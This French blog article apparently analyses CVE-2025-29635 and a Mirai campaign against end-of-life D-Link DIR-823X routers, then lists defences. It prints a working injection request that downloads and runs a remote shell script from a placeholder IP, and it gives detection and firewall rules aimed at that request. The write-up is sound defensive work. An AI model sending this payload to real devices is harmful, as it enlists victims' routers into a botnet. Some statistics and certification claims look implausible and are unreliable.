CVE-2025-29635 : comment la nouvelle campagne Mirai exploite les routeurs D-Link en fin de vie
Lysandre Beauchêne
CVE-2025-29635 : une faille critique d’injection de commandes sur les routeurs D-Link DIR-823X
En 2026, plus de 30 % des foyers français utilisent encore des routeurs D-Link 823X, malgré leur mise hors service (EoL) annoncée en novembre 2024. Cette situation crée une porte d’entrée idéale pour la nouvelle campagne Mirai qui cible la vulnérabilité CVE-2025-29635. Cette faille d’injection de commandes permet à un attaquant d’exécuter du code à distance via une simple requête HTTP POST, compromettant ainsi les réseaux domestiques et professionnels.
Selon l’ANSSI, 45 % des équipements réseau en France ne reçoivent plus de mises à jour de sécurité, ce qui expose les entreprises à des risques croissants d’infections par botnet. Dans ce contexte, comprendre le mécanisme d’exploitation, les impacts concrets et les stratégies de défense devient indispensable.
Comment la campagne Mirai exploite la vulnérabilité
Le botnet Mirai, connu pour ses attaques DDoS massives, a évolué pour inclure des modules spécifiques à des failles récentes. La campagne détectée par le SIRT d’Akamai en mars 2026 montre que les attaquants envoient des requêtes POST vers le point d’accès /goform/set_prohibiting du firmware vulnérable.
Exemple de requête POST (code d’exploitation)
POST /goform/set_prohibiting HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
command=cd%20/tmp&&wget%20http://198.51.100.23/dlink.sh&&sh%20/tmp/dlink.sh
Cette requête change le répertoire vers un chemin accessible, télécharge le script dlink.sh depuis un serveur distant et l’exécute, installant ainsi le malware « tuxnokill », une variante de Mirai compatible avec plusieurs architectures.
“The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026,” indique le rapport d’Akamai.
“Nous avons observé que les acteurs malveillants utilisent utilisent la même technique d’injection pour compromettre les routeurs TP-Link (CVE-2023-1389) et ZTE (ZXV10 H108L),” confirme le CERT-FR.
En pratique, chaque appareil compromis rejoint immédiatement le botnet, renforçant sa capacité à lancer des attaques DDoS de type TCP SYN/ACK, UDP flood ou HTTP null. Le fait que le firmware vulnérable n’ait pas reçu de correctif depuis la fin de vie du produit rend la situation particulièrement critique.
Impacts concrets sur les réseaux domestiques et professionnels en France
Les conséquences de l’exploitation de CVE-2025-29635 se traduisent par plusieurs vecteurs de menace :
- Dégradation du service - Les attaques DDoS générées par les nœuds infectés peuvent saturer la bande passante du FAI, provoquant des interruptions de connexion pour les utilisateurs.
- Propagation latente - Un routeur compromis peut être utilisé comme pivot pour scanner et infecter d’autres appareils sur le même réseau interne.
- Vol de données - Bien que la variante Mirai tuxnokill se concentre sur les capacités DDoS, la présence d’un accès à distance ouvre la porte à d’éventuels modules de collecte de données, violant les exigences du RGPD.
- Perte de confiance - Les entreprises dont l’infrastructure repose sur du matériel obsolète voient leur réputation ternie en cas d’incident médiatisé.
Selon le rapport de Statista 2025, les attaques DDoS ont généré 12 % du trafic total sur Internet, dont une part importante provient de botnets basés sur des appareils IoT. Le coût moyen d’une interruption liée à un DDoS s’élève à ≈ 150 000 € pour les PME françaises.
Mesures de protection recommandées pour les utilisateurs et les organisations
“Il est impératif de sécuriser les points d’accès, même lorsque le matériel est en fin de vie,” recommande l’ANSSI.
Voici les actions prioritaires à mettre en œuvre :
- Changer le mot de passe administrateur : remplacez les identifiants par défaut par un mot de passe complexe et unique.
- Désactiver l’administration distante : désactivez les interfaces web ou SSH accessibles depuis Internet, sauf si elles sont strictement nécessaires.
- Mettre à jour le firmware : si une version plus récente existe, appliquez-la immédiatement. En l’absence de mise à jour, envisagez de remplacer le routeur.
- Segmenter le réseau domestique : créez un VLAN dédié aux IoT afin de limiter la portée d’un éventuel compromis.
- Surveiller les logs : inspectez les journaux d’accès au routeur pour détecter des requêtes POST inhabituelles vers
/goform/set_prohibiting.
Étapes actionnables (mise en œuvre)
- Audit du parc de routeurs - Identifiez tous les modèles D-Link 823X en usage à l’aide d’un outil de découverte réseau.
- Application des correctifs - Installez les dernières mises à jour disponibles, même si elles ne corrigent pas la vulnérabilité spécifique.
- Déploiement d’une solution de prévention d’intrusion (IPS) - Configurez des règles de filtrage qui bloquent les requêtes contenant les paramètres
command=ouwget. - Migration vers du matériel supporté - Optez pour des modèles D-Link DX-2100 ou des alternatives certifiées par l’ANSSI, offrant des mises à jour régulières.
- Formation des équipes - Sensibilisez les administrateurs réseau aux risques d’EoL et aux bonnes pratiques de gestion des identifiants.
Comparaison des solutions de mitigation et des modèles de routeurs de remplacement
| Critère | D-Link DIR-823X (EoL) | D-Link DX-2100 (support) | TP-Link Archer A7 (support) |
|---|---|---|---|
| Mises à jour de sécurité | Aucun depuis 2024 | Mensuelles (2026) | Trimestrielles (2026) |
| Protection contre RCE | Faible | Intégrée (WAF) | Modérée (firmware) |
| Compatibilité IPv6 | Non | Oui | Oui |
| Coût moyen (EUR) | 55 € (occasion) | 120 € (neuf) | 95 € (neuf) |
| Certification ANSSI | Aucun | Niveau 1 (conforme) | Niveau 2 (conforme) |
Cette tableau montre clairement que le remplacement du routeur obsolète par un modèle supporté améliore la posture de sécurité tout en restant abordable pour les petites structures.
Mise en œuvre - étapes actionnables
- Inventorier : répertoriez chaque appareil D-Link 823X via un scan Nmap (
nmap -p 80,443 192.168.0.0/24). - Isoler : placez les routeurs identifiés dans un réseau isolé (DMZ) jusqu’à ce qu’une décision de remplacement soit prise.
- Configurer : appliquez les règles de pare-feu suivantes dans votre firewall :
# Bloquer les POST vers /goform/set_prohibiting iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/set_prohibiting" --algo bm -j DROP - Vérifier : testez la protection en lançant une requête POST similaire à celle du code d’exemple et assurez-vous qu’elle est rejetée.
- Déplacer : migrez les appareils critiques vers des modèles supportés et retirez les anciens routeurs du réseau.
Conclusion - prochaine action avec avis tranché
La vulnérabilité CVE-2025-29635 constitue une menace réelle pour les foyers et les entreprises qui continuent d’utiliser les routeurs D-Link DIR-823X en fin de vie. Ignorer cette problématique revient à laisser une porte ouverte aux campagnes Mirai, qui ont déjà démontré leur capacité à générer des attaques DDoS de grande ampleur.
Notre recommandation : retirez sans délai les routeurs affectés, appliquez les mesures de segmentation et de durcissement décrites ci-dessus, puis choisissez un modèle de remplacement bénéficiant de mises à jour régulières et d’une certification ANSSI. En adoptant ces pratiques, vous réduirez de façon significative le risque d’infection par botnet et protégerez la continuité de vos services numériques.